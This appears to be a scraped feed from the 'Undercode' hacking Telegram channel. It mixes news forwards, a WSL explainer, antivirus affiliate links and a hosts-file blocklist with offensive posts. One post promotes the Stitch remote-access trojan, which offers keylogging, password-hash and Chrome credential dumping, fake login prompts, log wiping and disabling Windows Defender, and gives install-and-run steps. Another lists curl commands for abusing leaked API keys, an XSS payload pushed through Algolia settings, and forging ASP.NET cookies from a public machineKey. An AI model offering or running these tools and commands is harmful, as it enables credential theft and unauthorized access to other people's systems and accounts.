UNDERCODE COMMUNITY
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method.
+ AI Practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
Forwarded from UNDERCODE NEWS
"He offered $ 1 million for installing malware" #Cyberattacks
Forwarded from UNDERCODE NEWS
Be aware: this new variant of the Mykings botnet is remotely controlled via PcShare
#Malwares
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What is WSL for? What are the limitations of WSL2 (Windows Subsystem for Linux)

1) we are not actually installing Kali Linux
in fact we don't install Linux at all

2) The Windows Subsystem for Linux is NOT a virtual machine
and is NOT real Linux. If you understand what Wine is (which is also not an emulator), then WSL2 is also a Wine in reverse. WSL2 is simply trying to serve as a Linux kernel to the best of its ability for GNU applications, without being a true Linux kernel.

πŸ¦‘What does this mean from a practical point of view?

1) This means that we get a very similar situation with Wine, which tries to perform Windows functions (again, to the best of its ability) - something will work fine, something will work with errors, and something will not work at all. ...

2) In WSL2, 100% will not work (in the coming years, and maybe never at all)

absolutely all wireless attacks (Wi-Fi, Bluetooth)

3) Hashcat and other programs using video cards to perform computations (brute force)

4) low-level access to USB devices (for example, to make an image of a disk / flash drive for forensic research)
background server applications

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘BEST OFFERS & TRIALS NOW, IN ANTIVIRUS APPS FOR WINDOWS 2020 :


https://www.bitdefender.co.uk/media/html/consumer/new/100-vip-special-opt/?pid=vip_special_offer&cid=aff|c|ir&clickid=WqN2mZX1mxyOWzVwUx0Mo3EAUkiX3mRneUFAUA0&irgwc=1&MPid=221109&cid=aff%7Cc%7CIR

https://uk.norton.com/ps/4up_norton360_nav_ns_nd_np_Reading_tw_nb.html

https://www.avira.com/en/campaigns/acq/avpro/Techradar/av-pro-uk?x-c-channel=partnerize&x-a-medium=1100l10026&utm_source=partnerize&utm_medium=affiliate&utm_content=1100l52030&utm_term=futurepublishing&x-clickref=1011lbhuuLcX

https://www.trendmicro.com/en_gb/forHome/products/antivirus-plus.html?irclickid=QAe2DuSk8xyOUQF0M-0V7wD0UkiX3mTueUFAUA0&irgwc=1

https://www.kaspersky.co.uk/antivirus?sid=itproportal-gb-8824742738814738000&AID=12584495&PID=100134076&campaign=tcid_cj_12584495_100134076_cdb7fa2df43811ea83bd00790a180511_x5&CJ_CID=3486349&CJ_PID=100134076&CJ_CID_NAME=Future+Publishing+Ltd&utm_source=CJ&utm_medium=affiliate&CJEVENT=cdb7fa2df43811ea83bd00790a180511


https://www.amazon.com/s?tag=georiot-us-default-20&k=G+Data+Antivirus&ascsubtag=itproportal-row-7913326345896524000-20

https://www.webroot.com/gb/en/home?sc=70161000000TRru&rc=8200

https://www.eset.com/us/home/antivirus/?sid=hawk-custom-tracking&ref=AFC-CJ&attr=100134076&pub=11553473&shop=itproportal-row-6973904843495994000&utm_source=100134076&utm_medium=affiliate&utm_content=11553473&cjevent=0be11851f43911ea83bd00790a180511

@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
malicious.link post snagging-creds-from-locked-machine.pdf
401.9 KB
First o, this is dead simple and shouldn’t work, but it does. Also, there is no possible way that I’m the rst one that has identied this, but here it is (trust me, I tested it so many ways to conrm it because I couldn’t believe it was true) TL;DR USB Ethernet + DHCP + Responder == Creds ... #Full
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Top Execution logging and tracing tools :
(easy install)

* [Wireshark](https://www.wireshark.org/) - A free and open-source packet analyzer

* [tcpdump](http://www.tcpdump.org/) - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture

* [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface

* [Charles Proxy](https://charlesproxy.com) - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic

* [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) - USB capture for Linux.

* [USBPcap](https://github.com/desowin/usbpcap) - USB capture for Windows.

* [dynStruct](https://github.com/ampotos/dynStruct) - structures recovery via dynamic instrumentation.

* [drltrace](https://github.com/mxmssh/drltrace) - shared library calls tracing.

enjoy:)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Be aware of storing sensitive informations on SK Hynix and LG Electronics , both were hacked and 50GB confidential files were encrypted and extorted
#DataBreaches
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘DANGEROUS HACKING 2020

F E A T U R E S :

Cross Platform Support
Command and file auto-completion
Antivirus detection
Able to turn off/on display monitors
Hide/unhide files and directories
View/edit the hosts file
View all the systems environment variables
Keylogger with options to view status, start, stop and dump the logs onto your host system
View the location and other information of the target machine
Execute custom python scripts which return whatever you print to screen
Screenshots
Virtual machine detection
Download/Upload files to and from the target system
Attempt to dump the systems password hashes
Payloads' properties are "disguised" as other known programs
Display a user/password dialog box to obtain user password
Dump passwords saved via Chrome
Clear the System, Security, and Application logs
Enable/Disable services such as RDP,UAC, and Windows Defender
Edit the accessed, created, and modified properties of files
Create a custom popup box
View connected webcam and take snapshots
View past connected wifi connections along with their passwords
View information about drives connected
View summary of registry values such as DEP
Mac OSX Specific
Display a user/password dialog box to obtain user password
Change the login text at the user's login screen
Webcam snapshots
Mac OSX/Linux Specific
SSH from the target machine into another host
Run sudo commands
Attempt to bruteforce the user's password using the passwords list found in Tools/
Webcam snapshots? (untested on Linux)

🄸🄽🅂🅃🄰🄻🄻🄰🅃🄸🄾🄽 & 🅁🅄🄽 :

1) git clone https://github.com/nathanlopez/Stitch.git

2) cd Stitch

3) # for Windows
pip install -r win_requirements.txt

# for Mac OSX
pip install -r osx_requirements.txt

# for Linux
pip install -r lnx_requirements.txt

4) python main.py

U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
6 Days Lab 1.1 Vulnhub.pdf
2.4 MB
full + pictures
Forwarded from UNDERCODE NEWS
An old and popular tool will be removed from Windows 10
#Updates
Forwarded from UNDERCODE NEWS
According to the .ru zone: why ransomware bypasses the Russian domain
#Malwares
Forwarded from WEB UNDERCODE - PRIVATE
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘API Key Leaks 2020 :

1) Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'

2) AWS Access Key ID & Secret

> git clone https://github.com/andresriancho/enumerate-iam

> cd enumerate-iam

> ./enumerate-iam.py --access-key AKIA... --secret-key XXX..

3) Slack API Token

> curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"

4) Facebook Access Token
curl 'https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2'

5) Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'

6) Twilio Account_sid and Auth token

> curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN

7) Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'

8) Twitter Bearer Token

> curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'

9) Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"

10) HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4

11) Auth Bypass using pre-published Machine Key
By default, ASP.NET creates a Forms Authentication Ticket with a unique username associated with it, and the date and time at which the ticket was issued and expires. So all you need is a unique username and a machine key to create a forms authentication token.

12) That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification. A machineKey copied from documentation or a public repository is known to everyone, so an application configured with it will accept tokens that anyone can forge.

Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.

<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Exploit with Blacklist3r

🦑 decrypt cookie :

$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes

# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt

✅git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A hosts file for use on any operating system to block bad domains out of your servers or devices:

WHAT IS A HOSTS FILE?

1) A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.

2) In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.

3) Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.

4) A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.

πŸ¦‘WHERE DO I PUT THIS ON MY COMPUTER?

1) To modify your current hosts file, look for it in the following places and modify it with a text editor.

Linux, Mac OS X, iOS, Android: /etc/hosts folder.

2) Windows Systems: %SystemRoot%\system32\drivers\etc\hosts folder.


»DOWNLOAD FREE :

https://github.com/mitchellkrogza/Badd-Boyz-Hosts

enjoy ❤️👍🏻
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from WEB UNDERCODE - PRIVATE
List of 100+ Cyber Security RSS Feeds.pdf
1.5 MB